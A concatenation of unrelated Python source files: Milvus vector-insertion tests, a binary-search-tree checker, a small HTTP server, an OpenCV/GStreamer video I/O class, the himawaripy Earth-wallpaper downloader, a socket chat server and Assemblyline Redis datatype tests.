expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
connect.flush([ip_collection])
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2 a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
connect.flush([ip_collection])
assert len(ids) == nq
# check search result
status, result = connect.search_vectors(ip_collection, top_k, vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, ip_collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for i in range(nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, ip_collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.level(2)
def test_add_vectors_without_connect(self, dis_connect, ip_collection):
'''
target: test add vectors without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
with pytest.raises(Exception) as e:
status, ids = dis_connect.add_vectors(ip_collection, vectors)
def test_add_vector_dim_not_matched(self, connect, ip_collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, ip_collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, ip_collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of IP
method: create 50 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
for j in range(10):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddAdvance:
@pytest.fixture(
scope="function",
params=[
1,
10,
100,
1000,
pytest.param(5000 - 1, marks=pytest.mark.xfail),
pytest.param(5000, marks=pytest.mark.xfail),
pytest.param(5000 + 1, marks=pytest.mark.xfail),
],
)
def insert_count(self, request):
yield request.param
def test_insert_much(self, connect, collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_ip(self, connect, ip_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(ip_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_jaccard(self, connect, jac_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_hamming(self, connect, ham_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(ham_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_tanimoto(self, connect, tanimoto_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(tanimoto_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
class TestNameInvalid(object):
"""
Test adding vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors)
assert not status.OK()
@pytest.mark.level(2)
def test_add_vectors_with_invalid_tag_name(self, connect, get_collection_name, get_tag_name):
collection_name = get_collection_name
tag_name = get_tag_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors, partition_tag=tag_name)
assert not status.OK()
class TestAddCollectionVectorsInvalid(object):
single_vector = gen_single_vector(dim)
vectors = gen_vectors(2, dim)
"""
Test adding vectors with invalid vectors
"""
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def gen_vector(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vector_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_single_vector = copy.deepcopy(self.single_vector)
tmp_single_vector[0][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_single_vector)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_jaccard(self, connect, jac_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(jac_collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_hamming(self, connect, ham_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(ham_collection, tmp_vectors)
|
is_bst_hard.py
|
# python3
"""
You are given a binary tree with integers as its keys.
You need to test whether it is a correct binary search tree
For example binary tree shown below is considered as INCORRECT
2
/ \
2 2
but binary tree
2
/ \
1 2
is considered as CORRECT
Recursive in-order DFS traversal was used.
"""
import sys
import threading
sys.setrecursionlimit(10 ** 7) # max depth of recursion
threading.stack_size(2 ** 25) # new thread will get stack of such size
def is_key_gr_or_eq_root(key, root_key):
return key >= root_key
def is_key_smaller_root(key, root_key):
return key < root_key
def walk_decorator(tree, fail_condition):
root_key = tree[0][0]
min_key_stack = []
def walk(i):
stack = []
while i != -1:
stack.append(i)
min_key = tree[i][0]
i = tree[i][1]
l_ch_key = float("-inf")
if stack:
min_key_stack.append(min_key)
while stack:
i = stack.pop()
key = tree[i][0]
if key <= l_ch_key or fail_condition(key, root_key):
return False
l_ch_key = key
r_ch_i = tree[i][2]
if r_ch_i != -1:
r_ch_key = tree[r_ch_i][0]
if key > r_ch_key or not walk(r_ch_i):
return False
if min_key_stack.pop() < key:
return False
return True
return walk
def is_bst(tree):
is_left_bst = walk_decorator(tree, is_key_gr_or_eq_root)(tree[0][1])
if not is_left_bst:
return False
is_right_bst = walk_decorator(tree, is_key_smaller_root)(tree[0][2])
return is_left_bst and is_right_bst
def main():
n = int(next(sys.stdin))
tree = [tuple(map(int, line.split())) for line in sys.stdin]
if n == 0 or is_bst(tree):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
|
sync_server.py
|
#!/usr/bin/env python3
# coding: utf-8
import multiprocessing
import os
import sys
import time
from pypi_top_packages_async import get_from_pypi
from http.server import SimpleHTTPRequestHandler as Handler
from http.server import HTTPServer as Server
start = time.time()
MAX_PKGS = 200
# Read port selected by the cloud for our application
PORT = int(os.getenv('PORT', 8000))
# Change current directory to avoid exposure of control files
try:
os.chdir('static_parent_dir')
except FileNotFoundError:
pass
def create_html_from_pypi(max_pkgs=MAX_PKGS):
p = multiprocessing.current_process()
print('Starting process:', p.name, p.pid)
sys.stdout.flush()
try:
max_pkgs = int(sys.argv[1])
except (IndexError, ValueError):
max_pkgs = MAX_PKGS
print(max_pkgs)
packages = get_from_pypi(max_pkgs)
print(time.time() - start, 'seconds,', len(packages), 'packages.')
# with open('index.html', 'w') as out_file:
# out_file.write(create_html(packages)) # read_packages(max_pkgs)))
print(time.time() - start, 'seconds')
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
return 42
# start a separate process to gather data from PyPI in the background
multiprocessing.Process(name='PyPI Scan', target=create_html_from_pypi).start()
# while the main process runs a webserver
httpd = Server(("", PORT), Handler)
if PORT == 8000: # we are running the server on localhost
import webbrowser
webbrowser.open('localhost:8000')
try:
print("Start serving at port %i" % PORT)
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
URI to input stream. It could be image sequence (e.g. '%06d.jpg'), video file (e.g. 'file.mp4'),
MIPI CSI camera (e.g. 'csi://0'), USB/V4L2 camera (e.g. '/dev/video0'),
RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
or HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>')
output_uri : str, optionals
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
For live sources, a larger buffer drops less frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""Start capturing from file or device."""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""Stop capturing from file or device."""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""Reads the next video frame.
Returns
-------
ndarray
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""Writes the next video frame."""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""Cleans up input and output sources."""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
import subprocess
import appdirs
from PIL import Image
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 1, 0)
counter = None
HEIGHT = 550
WIDTH = 550
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
print("Offset is greater than +10, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
sys.exit('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="himawaripy", appauthor=False))
parser.add_argument("--dont-change", action="store_true", dest="dont_change", default=False,
help="don't change the wallpaper (just download it)")
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def thread_main(args):
global counter
counter = mp.Value("i", 0)
level = args.level # since we are going to use it a lot of times
print("Updating...")
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
requested_time = calculate_time_offset(latest, args.auto_offset, args.offset)
if args.auto_offset or args.offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (args.level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
for file in iglob(path.join(args.output_dir, "himawari-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("himawari-%Y%m%dT%H%M%S.png", requested_time))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if not args.dont_change:
r = set_background(output_file)
if not r:
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
else:
print("Not changing your wallpaper as requested.")
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
server.py
|
'''
Server Side code
'''
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf-8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, ))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, )+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
while True:
try:
SERVER.bind(ADDR)
break
except:
subprocess.call(' sudo lsof -t -i tcp:33000 | xargs kill -9', shell = True)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
test_remote_datatypes.py
|
import pytest
import random
import time
from threading import Thread
from assemblyline.common.uid import get_random_id
# noinspection PyShadowingNames
def test_hash(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.hash import Hash
with Hash('test-hashmap') as h:
assert h.add("key", "value") == 1
assert h.exists("key") == 1
assert h.get("key") == "value"
assert h.set("key", "new-value") == 0
assert h.keys() == ["key"]
assert h.length() == 1
assert h.items() == {"key": "new-value"}
assert h.pop("key") == "new-value"
assert h.length() == 0
# Make sure we can limit the size of a hash table
assert h.limited_add("a", 1, 2) == 1
assert h.limited_add("a", 1, 2) == 0
assert h.length() == 1
assert h.limited_add("b", 10, 2) == 1
assert h.length() == 2
assert h.limited_add("c", 1, 2) is None
assert h.length() == 2
assert h.pop("a")
# Can we increment integer values in the hash
assert h.increment("a") == 1
assert h.increment("a") == 2
assert h.increment("a", 10) == 12
assert h.increment("a", -22) == -10
# noinspection PyShadowingNames
def test_expiring_hash(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.hash import ExpiringHash
with ExpiringHash('test-expiring-hashmap', ttl=1) as eh:
assert eh.add("key", "value") == 1
assert eh.length() == 1
time.sleep(1.1)
assert eh.length() == 0
# noinspection PyShadowingNames
def test_basic_counters(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.counters import Counters
with Counters('test-counter') as ct:
ct.delete()
for x in range(10):
ct.inc('t1')
for x in range(20):
ct.inc('t2', value=2)
ct.dec('t1')
ct.dec('t2')
assert sorted(ct.get_queues()) == ['test-counter-t1',
'test-counter-t2']
assert ct.get_queues_sizes() == {'test-counter-t1': 9,
'test-counter-t2': 39}
ct.reset_queues()
assert ct.get_queues_sizes() == {'test-counter-t1': 0,
'test-counter-t2': 0}
# noinspection PyShadowingNames
def test_tracked_counters(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.counters import Counters
with Counters('tracked-test-counter', track_counters=True) as ct:
ct.delete()
for x in range(10):
ct.inc('t1')
for x in range(20):
ct.inc('t2', value=2)
assert ct.tracker.keys() == ['t1', 't2']
ct.dec('t1')
ct.dec('t2')
assert ct.tracker.keys() == []
assert sorted(ct.get_queues()) == ['tracked-test-counter-t1',
'tracked-test-counter-t2']
assert ct.get_queues_sizes() == {'tracked-test-counter-t1': 9,
'tracked-test-counter-t2': 39}
ct.reset_queues()
assert ct.get_queues_sizes() == {'tracked-test-counter-t1': 0,
'tracked-test-counter-t2': 0}
# noinspection PyShadowingNames
